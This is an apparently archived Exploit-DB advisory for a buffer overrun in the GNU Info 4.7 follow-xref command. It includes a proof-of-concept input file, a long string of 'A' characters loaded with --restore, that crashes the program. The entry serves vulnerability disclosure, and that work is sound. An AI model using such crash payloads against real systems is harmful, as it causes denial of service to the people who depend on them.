GNU Info 4.7 Follow XRef Buffer Overrun Vulnerability

2004-08-06T00:00:00
ID EDB-ID:24355
Type exploitdb
Reporter Josh Martin
Modified 2004-08-06T00:00:00

Description

GNU Info 4.7 Follow XRef Buffer Overrun Vulnerability. Dos exploit for linux platform

                                        
                                            source: http://www.securityfocus.com/bid/10882/info

GNU Info is reported prone to a buffer overrun vulnerability. The vulnerability is reported to present itself due to a lack of boundary checks performed on argument data for the (f) follow xref Info command.

An attacker may exploit this vulnerability by crafting a malicious Info script that is sufficient to trigger the issue.

Although this vulnerability is reported to affect info version 4.7-2.1, other versions might also be affected.

The following can be saved to a file and called as:
info info --restore=info.bug to create a segmentation fault.

[START info.bug]
gExpert Info

fAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

[END info.bug]